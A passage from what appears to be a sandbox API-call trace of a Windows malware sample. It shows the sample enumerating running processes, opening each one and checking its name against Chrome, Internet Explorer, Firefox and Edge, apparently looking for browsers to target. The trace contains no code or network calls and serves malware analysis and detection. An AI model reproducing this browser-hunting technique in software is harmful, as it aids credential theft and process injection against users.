	[0188.551] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.551] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1b4
	[0188.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.552] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0188.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.552] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.552] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0188.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.569] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.569] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.570] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x1b8
	[0188.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.570] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0188.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.570] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.571] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0188.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.571] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.571] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.572] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x1bc
	[0188.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.572] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0188.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.572] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.573] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0188.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.573] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.573] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.574] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x1c0
	[0188.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.574] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0188.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.574] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.575] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0188.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.575] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.575] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.576] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1c4
	[0188.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.576] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0188.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.576] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.577] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0188.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.577] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.577] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.578] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x1c8
	[0188.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.578] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0188.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.578] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.579] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0188.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.579] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.579] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.584] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1cc
	[0188.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.585] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0188.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.585] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.585] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0188.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.585] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.586] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0188.586] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1d0
	[0188.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.586] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0188.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.587] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.587] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0188.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.587] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.588] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.588] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1d4
	[0188.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.588] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0188.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.589] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.589] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0188.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.590] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.590] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0188.591] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x1d8
	[0188.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.591] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0188.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.591] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.592] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0188.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.592] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.592] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0188.593] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x1dc
	[0188.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.594] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0188.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.594] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.594] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0188.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.594] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.595] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.595] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x1e0
	[0188.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.595] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0188.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.596] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.596] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0188.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.596] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.597] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0188.597] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x1e4
	[0188.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.597] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0188.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.598] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.598] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0188.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.598] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.599] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0188.599] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x1e8
	[0188.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.599] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0188.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.600] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.600] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0188.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.600] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.600] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0188.601] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1ec
	[0188.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.601] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0188.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.601] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.602] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0188.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.602] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.602] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0188.603] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x1f0
	[0188.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.603] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0188.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.603] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.603] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0188.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.604] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.604] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0188.605] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0188.605] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0188.605] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1f4
	[0188.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.606] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0188.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.606] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.607] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0188.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.607] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.608] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0188.608] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1f8
	[0188.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.609] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0188.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.609] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.609] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0188.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.609] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.610] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0188.610] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1fc
	[0188.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.610] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0188.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.611] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.611] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0188.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.611] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.612] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0188.612] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x200
	[0188.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.612] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0188.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.613] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.613] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0188.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.613] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.614] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0188.614] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x204
	[0188.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.614] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0188.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.615] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.615] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0188.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.616] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.616] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0188.617] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x208
	[0188.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.617] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0188.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.617] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.618] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0188.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.618] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.618] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0188.619] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x20c
	[0188.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.619] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0188.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.619] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.620] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0188.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.622] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.622] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0188.623] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x210
	[0188.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.623] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0188.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.624] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.624] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0188.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.624] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.625] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0188.625] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x214
	[0188.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
